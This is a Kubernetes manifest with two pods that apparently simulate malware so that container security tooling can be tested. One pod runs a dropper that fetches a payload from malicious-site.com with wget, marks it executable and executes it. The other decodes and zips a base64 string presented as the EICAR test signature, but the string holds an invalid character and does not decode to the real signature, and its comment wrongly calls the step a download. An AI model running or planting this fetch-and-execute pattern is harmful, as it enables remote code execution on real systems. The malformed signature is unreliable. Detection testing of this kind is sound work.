apiVersion: v1
kind: Pod
metadata:
  name: malware-advanced
spec:
  containers:
  - name: dropper-container
    image: busybox
    # This simulates a dropper: downloads a script, makes it executable, and runs it
    command: ['sh', '-c', 'echo "wget http://malicious-site.com/payload && chmod +x payload && ./payload" > /tmp/dropper.sh && sh /tmp/dropper.sh && sleep 3600']
---
apiVersion: v1
kind: Pod
metadata:
  name: malware-compressed
spec:
  containers:
  - name: zip-container
    image: alpine
    # Downloads a base64 encoded string that expands to a test signature inside a zip
    command: ['sh', '-c', 'apk add --no-cache zip && echo "WDVPIVBBW%9JQ0U3KzhSUEU1SFFNQU5UQUNDRVNTLVNUREFSRC1BTlRJVklSVVMtVEVTVC1GSUxFIQo=" | base64 -d > eicar.txt && zip eicar.zip eicar.txt && rm eicar.txt && sleep 3600']
